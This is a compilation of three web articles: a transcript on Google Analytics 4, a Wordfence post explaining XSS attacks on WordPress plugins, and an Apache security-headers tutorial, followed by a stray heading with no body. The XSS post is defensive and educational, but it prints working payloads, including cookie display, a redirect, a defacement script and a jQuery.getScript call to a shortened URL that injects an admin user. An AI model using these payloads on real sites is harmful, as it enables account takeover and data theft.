Top 4 Things to Know About GA4 — Whiteboard Friday

In this week’s Whiteboard Friday, Dana brings you some details on the exciting new world of Google Analytics 4. Watch and learn how to talk about it when clients and coworkers are intimidated by the move.

whiteboard outlining four insights into GA4


Video Transcription

Hi, my name is Dana DiTomaso. I’m President at Kick Point. And I am here today at MozCon 2022 to bring you some details on the exciting world of Google Analytics 4, which I know all of you are like, “Ugh, I don’t want to learn about analytics,” which is totally fair. I also did not want to learn about analytics.

And then I kind of learned about it whether I liked it or not. And you should, too, unfortunately. 

So I think the biggest thing about the move from Universal Analytics to GA4 is that people log in, everything looks different, they think, “I don’t like it,” and then they leave. And I agree the user interface in GA4 leaves a lot to be desired. I don’t think there’s necessarily been a lot of good education, especially for those of us who aren’t analysts on a day-to-day basis.

We’re not all data scientists. I’m not a data scientist. I do marketing. So what I’m hoping is I can tell you the things you should know about GA4 on just a basic sort of level, so that you have a better vocabulary to talk about it when people are horrified by the move to GA4, which is inevitable. It’s going to happen. You’ve got to get it on your site starting basically immediately, if you don’t already have it. So I started out with three things, and then I realized there was a fourth thing. So you get a bonus, exciting bonus, but we’ll start with the first three things. 

1. It’s different

So the first thing is it’s different, which I know is obvious. Yes, of course, Dana, it’s different. But it’s different. Okay, so in Universal Analytics, there were different types of hits that could go into analytics, which is where hits came from originally as a metric that people talked about. So, for example, in Universal Analytics, you could have a pageview, or you could have a transaction, or you could have an event.

And those were all different types of hits. In GA4, everything is an event. There is a pageview event. There is a transaction event. There is, well, an event event. I mean, you name the events whatever you want. And because of that, it’s actually a lot better way to report on your data.

So, for example, one of the things that I know people always wanted to be able to report on in Universal Analytics is what pages did people see and how did that relate to conversion rate. And that was really tricky because a pageview was something that was at the hit scope level, which means it was just like the individual thing that happened, whereas conversion rate is a session scoped thing.

So you couldn’t mash together a hit-scoped thing like pageview with conversion rate, which is session scoped. They just didn’t combine together unless you did some fancy blending stuff in Data Studio. And who’s got time for that? So now in GA4, because everything is an event, you have a lot more freedom with how you can slice and dice and interpret your data and figure out what pages people engaged with before they actually converted, or what was that path, not just the landing page, but the entire user journey on their path to conversion. So that part is really exciting.

2. Engagement rate is not reverse bounce rate

Second thing, engagement rate is a new metric in GA4. They do have bounce rate. They did recently announce it. I’m annoyed at it, so we’re going to talk about this a little bit. Engagement rate is not reverse bounce rate. But it is in GA4.

So in Universal Analytics, bounce rate was a metric that people reported on all the time, even though they shouldn’t have. I hate bounce rate so much. Just picture like a dumpster fire GIF right now across your screen. I hate bounce rate. And why I hate bounce rate is it’s so easily faked. Let’s say, for example, your boss says to you, “Hey, you know what, the bounce rate on our site is too high. Could you fix it?”

You’re like, “Oh, yeah, boss. Totally.” And then what you do is whenever somebody comes on your website, you send what’s called an interactive event off to Google Analytics at the same time. And now you have a 0% bounce rate. Congratulations. You got a raise because you made it up. Bounce rate could absolutely be faked, no question. And so when we moved over to GA4, originally there was no bounce rate.

There was engagement rate. Engagement rate has its own issues, but it’s not measuring anything similar to what bounce rate was. Bounce rate in UA meant that an interactive event didn’t happen. It didn’t matter if you spent an hour and a half on the page reading it closely. If you didn’t trigger an interactive event, you were still counted as a bounce when you left that page.

Whereas in GA4, an engaged session is by default someone spending 10 seconds with that tab, that website open, so active in their browser, or they visited two pages, or they had a conversion. Now this 10-second rule I think is pretty short. Ten seconds is not necessarily a lot of time for someone to be engaged with the website.

So you might want to change that. It’s under the tagging settings in your data stream. So if you go to Admin and then you click on your data stream and you go to more tagging settings and then you go to session timeouts, you can change it in there. And I would recommend playing around with that and seeing what feels right to you. Now GA4, literally just as I’m filming this, has announced bounce rate, which actually is reverse engagement rate. Please don’t use it.

Instead, think about engagement rate, which I think is a much more usable metric than bounce rate was in UA. And I’m kind of excited that bounce rate in UA is going away because it was [vocalization]. 

3. Your data will not match

All right. So next thing, your data is not going to match. And this is stressful because you’ve been reporting on UA data for years, and now all of a sudden it’s not going to match and people will be like, “But you said there were 101 users, and today you’re saying there were actually 102. What’s the problem?”

So, I mean, if you have that kind of dialogue with your leadership, you really need to have a conversation about the idea of accuracy in analytics, as in it isn’t, and error and everything else. But I mean, really the data is going to be different, and sometimes it’s a lot different. It’s not just a little bit different. And it’s because GA4 measures stuff differently than UA did. There is a page on Google Analytics Help, which goes into it in depth. But here are some of the highlights that I think you should really know sort of off the top of your head when you’re talking to people about this. 

Pageviews and unique pageviews

So first thing, a pageview metric, which we’re all familiar with, in Universal Analytics, this was all pageviews, including repeats. In GA4, same, pageview is pageview. Great.

So far so good. Then we had unique pageviews in Universal Analytics, which was only single views per session. So if I looked at the homepage and then I went to a services page and I went back to the homepage, I would have two pageviews of the homepage for pageviews. I would have one pageview of the homepage in unique pageviews. That metric does not exist in GA4. So that is something to really watch for: if you were used to reporting on unique pageviews, that is gone.

So I recommend now changing your reports to sort of like walk people through this comfort level of getting them used to the fact they’re not going to get unique pageviews anymore. Or you can implement something that I talk about in another one of my Whiteboard Fridays about being able to measure the percentage of people who are reloading tabs and tab hoarders. You could work that into this a little bit.

Users

Okay. Next thing is users. Users is really I think a difficult topic for a lot of people to get their heads around because they think, oh, user, that means that if I’m on my laptop and then I go to my mobile device, obviously I am one user. You’re usually not, unfortunately. You don’t necessarily get associated across multiple devices. Or if you’re using, say, a privacy-focused browser, like Safari, you may not even be associated in the same device, which kind of sucks.

The only real way you can truly measure if someone is a user across multiple sessions is if you have a login on your website, which not everybody does. A lot of B2B sites don’t have logins. A lot of small business sites don’t have logins. So users is already kind of a sketchy metric. And so unfortunately it’s one that people used to report on a lot in Universal Analytics.

So in Universal Analytics, users was total users, new versus returning. In GA4, it’s now active users. What is an active user? The documentation is a little unclear on how Google considers an active user. So I recommend reading that in depth. Just know that this is going to be different. You never should have been reporting on new versus returning users anyway, unless you had a login on your site because it was such a sketchy, bad metric, but I don’t think a lot of people knew how bad it was.

It’s okay. Just start changing your reports now so that when you have to start using GA4 on July 1, 2023 (when UA is done for real), at least it’s not so much of a shock when you do make that transition.

Sessions

So one other thing to think about as well with the changes is sessions. So in Universal Analytics, a session was the active use of a site, so you’re clicking on stuff.

It had a 30-minute timeout. And you may have heard never to use UTM tags on internal links on your website. And the reason why is because if someone clicked on an internal link on your website that had UTMs on it, your session would reset. And so you would have what’s called session breaking, where all of a sudden you would have a session that basically started in the middle of your website with a brand-new campaign and source and medium and completely detached from the session that they just had.

They would be a returning user though. That’s great. You shouldn’t have been reporting that anyway. Whereas in GA4 instead, now there’s an event because, remember, everything is an event now. There is an event that is called session start. And so that records when, well, the session starts. And then there’s also a 30-minute timeout, but there is no UTM reset.

Now that doesn’t mean that you should go out there and start using UTMs on internal links. I still don’t think it’s a great idea, but it’s not necessarily going to break things the way that it used to. So you can now see where did someone start on my site by looking at the session start event. I don’t know if it’s necessarily 100% reliable. We’ve seen situations where if you’re using consent management tools, for example, like a cookie compliance tool, you can have issues with sessions starting and whatnot.

So just keep that in mind is that it’s not necessarily totally foolproof, but it is a really interesting way to see where people started on the site in a way that you could not do this before. 

4. Use BigQuery

So bonus, bonus before we go. All right, the fourth thing that I think you should know about GA4, use BigQuery. There’s a built-in BigQuery export under the settings for GA4. Use it.

The reason why you should use it is: (a) the reports in GA4 are not great, the default reports, they kind of suck; (b) even the explorations are a bit questionable, like you can’t really format them to look nice at all. So what I’m saying to people is don’t really use the reports inside GA4 for any sort of useful reporting purposes. It’s more for ad hoc reporting. But even then, I would still turn to BigQuery for most of my reporting needs.

And the reason why is because GA4 has some thresholding applied. So you don’t necessarily get all the data out of GA4 when you’re actually looking at reports in it. And this happened to me actually just this morning before I recorded this Whiteboard Friday. I was looking to see how many people engaged with the form on our website, and because it was a relatively low number, it said zero.

And then I looked at the data in BigQuery and it said 12. That amount could be missing from the reports in GA4, but you can see it in BigQuery, and that’s because of the thresholding that’s applied. So I always recommend using the BigQuery data instead of the GA4 data. And in Google Data Studio, if that’s what you use for your reporting tool, the same issue applies when you use GA4 as a data source.

You have the same thresholding problems. So really just use BigQuery. And you don’t need to know BigQuery. All you need to do is get the data going into BigQuery and then open up Google Data Studio and use that BigQuery table as your data source. That’s really all you need to know. No SQL required. If you want to learn it, that’s neat.

I don’t even know it that well yet. But it is not something you have to know in order to report well on GA4. So I hope that you found this helpful and you can have a little bit better dialogue with your team and your leadership about GA4. I know it seems rushed. It’s rushed. Let’s all admit it’s rushed, but I think it’s going to be a really good move. I’m really excited about the new kinds of data and the amounts of data that we can capture now in GA4.

It really frees us from the category/action/label stuff that we were super tied to in Universal Analytics. We can record so much more interesting data now on every event. So I’m excited about that. The actual transition itself might be kind of painful, but then a year from now, we’ll all look back and laugh, right? Thank you very much.

Video transcription by Speechpad.com

About Dana DiTomaso

Dana is a partner at Kick Point, where she applies marketing strategies to grow clients’ businesses, in particular to ensure that digital and traditional play well together. With her deep experience in digital, Dana can separate real solutions from wastes of time (and budget).

Source:
https://moz.com/blog/top-things-to-know-about-ga4-whiteboard-friday

Cross-Site Scripting: The Real WordPress Supervillain

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal; some allow access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can expose a website to a wide range of threats, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

XSS exploit attempts blocked per day

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location where the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover event handler to run the injected code whenever the mouse went over the text box, but this could easily be modified to onload to run the code as soon as the page loads, or even onclick so it would run when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.
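To give a rough sense of what such a payload can look like (an illustrative sketch only; the field name below is hypothetical and this is not the exact value used in our testing), a separator value that is echoed back into the settings form without sanitization could close the value attribute and attach an event handler:

" onmouseover="alert(1)

When the settings tab is rendered again, the stored value turns the field markup into something along the lines of:

<input type="text" name="thousand_separator" value="" onmouseover="alert(1)">

and the alert fires whenever the mouse moves over the text box.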

Example of stored XSS

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.

Example of blind XSS

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or to send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website incorporates that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful, and it’s worth noting that the payload is never stored on the server, so the chance of success relies on the initial interaction with the user.

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification just by crafting a URL for the site in a specific way. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found”, as this is a common error message that is unlikely to cause alarm but could entice a victim to click on the redirect link that triggers the pop-up.

Example of reflected XSS

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.

Example of DOM-based XSS

How Does Cross-Site Scripting Impact WordPress Sites?

Cross-Site Scripting (XSS) vulnerabilities can have a number of repercussions for WordPress websites. Because WordPress pages are dynamically generated on page load, with content updated and stored in a database, it can be easier for a malicious actor to exploit a stored or blind XSS vulnerability, which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of the malicious actor.

When testing for XSS vulnerabilities, security researchers often use a simple method such as alert(), prompt(), or print() in order to test whether the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:
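A minimal illustrative example (the search parameter and domain here are hypothetical) is a URL such as:

https://example.com/?s=<script>alert(document.domain)</script>

If the parameter is reflected into the page without sanitization or encoding, the browser executes the script and displays an alert containing the current domain.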

Example of XSS popup

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case an attacker can utilize the window.location.replace() method or another similar method in order to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could be used to further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the site to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, the use of URL encoding can modify the appearance of the URL to make it more difficult to spot the malicious code. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that may prevent an attack from being successful without first encoding the payload.
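As a rough sketch of the obfuscation step described above (not the exact payload from our testing), the same redirect could be carried by an injected element and then URL-encoded before being sent to a victim:

<svg onload=location.replace('https://wordfence.com')>

URL-encoded, the payload is much harder to recognize at a glance:

%3Csvg%20onload%3Dlocation.replace(%27https%3A%2F%2Fwordfence.com%27)%3E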

Example of XSS redirect

When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript features like document.getElementById() or window.location, it is possible to replace page elements, or even the entire page, with new content. Defacements generally require a stored XSS vulnerability, as the malicious actor would want to ensure that all site visitors see the defacement.
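A minimal sketch of the idea (purely illustrative; the element ID is hypothetical) replaces a page’s main content as soon as the injected script runs:

<script>
  // Replace a specific element if it exists, otherwise the whole body
  var target = document.getElementById('content') || document.body;
  target.innerHTML = '<h1>This site has been defaced</h1>';
</script>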

Example of XSS defacement

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the location the data would normally be submitted to.

The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to use the document.cookie JavaScript property to list all cookies. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.
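The display step we used is about as simple as XSS payloads get; a sketch of it looks like this (only cookies that are accessible to JavaScript, i.e. not flagged HttpOnly, will be listed):

<script>alert(document.cookie)</script>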

Example of stealing cookies with XSS

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control; however, it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. This then sends collected keystrokes to a server under the threat actor’s control, where a PHP script is used to write the collected keystrokes to a log file. This technique could be used as we did here to target specific victims, or a stored XSS vulnerability could be taken advantage of in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use case, an XSS vulnerability must exist on the target website.

Example of XSS form theft

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If an XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious script. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form, with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.

Example of adding a malicious admin user with XSS

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes backdoors very useful for any threat actor that intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This lets the threat actor run commands directly in the victim’s browser, effectively taking control of it, and potentially opens up further attacks against the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of an XSS vulnerability in a website in order to gain access to the computer being used to access the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page on the website becomes a potential victim.

Example of an XSS backdoor

Tools Make Light Work of Exploits

There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works, malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own web apps for XSS and other client-side vulnerabilities that may be present. The flip side is that it can also be used by threat actors looking for potential attack targets.

One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is DOM-based XSS, which cannot be logged on the web server because it is processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter $_GET['s'], and are often just guesswork in the hope of finding a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET['url'], which is typically used to identify the domain name of the server the website is loaded from.

Top 10 parameters in XSS attacks

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has been a long-standing entry in the OWASP Top 10, many people think of it only as the ability to inject content like a popup, and few realize that a malicious actor could use this type of vulnerability to inject spam into a web page, redirect a visitor to a website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease, all thanks to the capabilities of JavaScript and some working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users, including Free, Premium, Care, and Response, against XSS exploits. If you believe your site has been compromised as a result of an XSS vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

Source:
https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain/

Seven Important Security Headers for Your Website

When it comes to securing your website, it’s all about minimizing attack surface and adding more layers of security. One strong layer that you can (and should) add is proper HTTP security headers. When responding to requests, your server should include security headers that help stop unwanted activity like XSS, MITM, and clickjacking attacks. While sending security headers does not guarantee 100% defense against all such attacks, it does help modern browsers keep things secure. So in this tutorial, we walk through seven of the most important and effective HTTP security headers to add a strong layer of security to your Apache-powered website.

Note: You can verify your site’s security headers using a free online tool such as the one provided by SecurityHeaders.com.

X-XSS-Protection

The X-XSS-Protection security header enables the XSS filter provided by some web browsers (IE8+ and older versions of Chrome and Safari). Note that this is a legacy header: most current browsers have removed their built-in XSS filters in favor of Content-Security-Policy, so this header mainly benefits older clients. Here is the recommended configuration for this header:

# X-XSS-Protection
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block rendering of the page when a reflected script attack is detected, rather than trying to sanitize it. For more configuration options and further information about X-XSS-Protection, check out these resources:

X-Frame-Options

The X-Frame-Options (XFO) security header helps modern web browsers protect your visitors against clickjacking and other threats. Here is the recommended configuration for this header:

# X-Frame-Options
<IfModule mod_headers.c>
	Header set X-Frame-Options "SAMEORIGIN"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block any frames/content requested from external locations. So if your own site includes an iframe that loads a resource from the same domain, the content will load normally. But if any iframe is included that loads resources from any other domain, the content will be blocked. For more configuration options and further information about X-Frame-Options, check out these resources:

X-Content-Type-Options

The X-Content-Type-Options security header enables supportive browsers to protect against MIME-type sniffing exploits. It does this by disabling the browser’s MIME sniffing feature, and forcing it to recognize the MIME type sent by the server. This header accepts only one value, nosniff, so the implementation looks like this:

# X-Content-Type-Options
<IfModule mod_headers.c>
	Header set X-Content-Type-Options "nosniff"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to use the MIME type declared by the origin server. There are a couple of precautions to keep in mind. First, as with any security header, it does not stop 100% of all attacks or threats; it does stop some of them, however, and thus provides another layer of protection for your site. Also note that this header originally was supported only in Chrome and later versions of Internet Explorer, but it is now supported by all major modern browsers. For more configuration options and further information about X-Content-Type-Options, check out these resources:

Strict-Transport-Security

The Strict-Transport-Security (HSTS) header instructs modern browsers to always connect via HTTPS (secure connection via SSL/TLS), and never connect via insecure HTTP (non-SSL) protocol. While there are variations to how this header is configured, the most common implementation looks like this:

# Strict-Transport-Security
<IfModule mod_headers.c>
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to always use HTTPS for connections. This helps stop man-in-the-middle (MITM) and other attacks targeting insecure HTTP connections. For more configuration options and further information about Strict-Transport-Security, check out these resources:

Referrer-Policy

The Referrer-Policy security header instructs modern browsers how to handle or exclude the Referer header (yes the header normally is spelled incorrectly, missing an “r”). For those who may not be familiar, the Referer header contains information about where a request is coming from. So for example if you are at example.com and click a link from there to domain.tld, the Referer header would specify example.com as the “referring” URL.

With that in mind, the Referrer-Policy enables you to control whether or not the Referer header is included with the request. Here is an example showing how to add the Referrer-Policy header via Apache:

# Referrer-Policy
<IfModule mod_headers.c>
	Header set Referrer-Policy "same-origin"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to only send the Referer header for requests to the current domain (same-origin). Keep in mind that this header is less about security and more about controlling referrer information, as is required by various rules and regulations (e.g., GDPR). For more configuration options and further information about Referrer-Policy, check out these resources:

Feature-Policy

The Feature-Policy header tells modern browsers which browser features are allowed. For example, if you want to ensure that only geolocation and vibrate features are allowed, you can configure the Feature-Policy header accordingly. It also enables you to control the origin for each specified feature. Note that newer browsers have renamed this header to Permissions-Policy (with a slightly different syntax), but the idea is the same. Here is an example showing how to add a Feature-Policy header via Apache:

# Feature-Policy
<IfModule mod_headers.c>
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to allow the geolocation feature for the site’s own origin and to disable the vibrate feature. Keep in mind that this header is less about security and more about ensuring a smooth experience for your users. For more configuration options and further information about Feature-Policy, check out these resources:

Content-Security-Policy

The Content-Security-Policy (CSP) header tells modern browsers which dynamic resources are allowed to load. This header is especially helpful at stopping XSS attacks and other malicious activity. This header provides extensive configuration options, which will need to be fine-tuned to match the specific resources required by your site. Otherwise if the header configuration does not match your site’s requirements, some resources may not load (or work) properly.

Because of this, there isn’t one most common example to look at. So instead here are a few different examples, each allowing different types of resources.

Example 1

First example, here is a CSP directive that allows resources from a CDN, and disallows any framed content or media plugins. This example is from the Google docs page linked below.

# Content-Security-Policy - Example 1
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https://cdn.example.com; child-src 'none'; object-src 'none'"
</IfModule>

Example 2

Second example, this CSP directive enables script resources loaded from a jQuery subdomain, and limits stylesheets and images to the current domain (self). This example is from the Mozilla docs page linked below.

# Content-Security-Policy - Example 2
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src 'none'; img-src 'self'; script-src 'self' https://code.jquery.com; style-src 'self'"
</IfModule>

Example 3

And for a third example, here is the directive I use on most of my WordPress-powered sites. Logically these sites tend to use the same types of resources, so I can keep things simple and use the following code on all sites:

# Content-Security-Policy - Example 3
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https:; font-src https: data:; img-src https: data:; script-src https:; style-src https:;"
</IfModule>

To get a better idea of what’s happening here, let’s apply a bit of formatting to the code:

Header set Content-Security-Policy "

default-src https:; 
font-src    https: data:; 
img-src     https: data:; 
script-src  https:; 
style-src   https:;

"

Stare at that for a few moments and you should get the idea: the header is setting the allowed source(s) for fonts, images, scripts, and styles. For each of these, a secure HTTPS connection is required. The only exception is that data URIs also are allowed as a source for fonts and images.

So for any of these examples, when added to your site’s .htaccess file or server configuration file, the code tells supportive browsers which dynamic resources are allowed and/or not allowed. But seriously, if you’re thinking about adding the powerful Content-Security-Policy security header, take a few moments to read through some of the documentation:

Where to get help with CSP

Yes, CSP can be confusing, but there is no reason to despair. There are numerous online tools that make it easier to figure out how to implement CSP; a quick search for “csp test online” yields many results. Even better, there now are “CSP generators” that literally write the code for you based on your input variables.

There are lots of useful tools out there to make CSP easier. Just enter your infos and copy/paste the results. If in doubt, use multiple tools and compare the results; the code should be the same. If not, don’t hesitate to reach out to the tool providers, who will be able to answer any questions, etc.

All Together

For the sake of easy copy/pasting, here is a code snippet that combines all of the above-described security headers.

Important: before adding this code to your site, make sure to read through each technique as explained in corresponding sections above. There may be important notes and information that you need to understand regarding each particular directive included in this code snippet.

# Security Headers
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
	Header set X-Frame-Options "SAMEORIGIN"
	Header set X-Content-Type-Options "nosniff"
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
	# Header set Content-Security-Policy ...
	Header set Referrer-Policy "same-origin"
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

As with each of the above techniques, this code may be added to your site via .htaccess or Apache config. Understand that this technique includes commonly used configurations for each of the included headers. You can (and should) go through each one to make sure that the configuration matches the requirements and goals of your site. Also remember to test thoroughly before going live.

Note: Notice the following line in the above “Security Headers” code snippet:

# Header set Content-Security-Policy ...

The pound sign or hash tag or whatever you want to call it means that the line is disabled and is ignored by the server. This means that the Content-Security-Policy directive is “commented out” and thus not active in this technique. Why? Because as explained previously, there is no recommended “one-size-fits-all” CSP example that works perfectly in all websites. Instead, you will need to replace the commented out line with your own properly configured CSP header, as explained above.

SSL and TLS Deployment Best Practices

Version 1.6-draft (15 January 2020)

